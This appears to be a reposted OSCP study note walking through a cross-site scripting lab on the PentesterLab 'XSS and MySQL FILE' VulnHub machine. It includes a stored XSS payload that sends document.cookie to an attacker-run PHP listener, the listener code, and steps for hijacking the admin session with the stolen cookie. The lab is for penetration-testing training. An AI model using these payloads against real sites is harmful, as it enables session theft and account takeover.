OSCP Security Technology - Cross-Site Scripting(XSS)
阿新 • • 發佈:2021-08-08
OSCP Security Technology - Cross-Site Scripting(XSS)
Installing XSS & MySQL FILE
https://www.vulnhub.com/entry/pentester-lab-xss-and-mysql-file,66/
Exploit this VM
Find the IP address of XSS_MySQL_File virtual machine.
netdiscover
Browse this PentesterLab vulnerable blog through Firefox.
Click Test buttion, and find a good place to test XSS.
<script>alert('XSS')</script>
Submit this query. Everytime fresh this website, we will see the alter .
Create a index.php file on the root folder.
nano index.php
<?php
$cookie = isset($_GET["test"])?$_GET["test"]:"";
?>
Run the php service.
service apache2 stop php -S 192.168.2.26:80
Submit a new query.
<script>location.href='http://192.168.2.26/index.php?test='+document.cookie;</script>
Then we can find the PHPSESSIONID on the backend.(a0b4od8kee0jlj9oeumjb819t3)
Install Firefox Add-on - Cookie Quick Manager.
Click button - Manager all Cookies.
Edit and save the cookie value the current one which find from the backend.
Refresh the website and click Admin button, then we can login without username and password.
We can post a new blog now.
相信未來 - 該面對的絕不逃避,該執著的永不怨悔,該捨棄的不再留念,該珍惜的好好把握。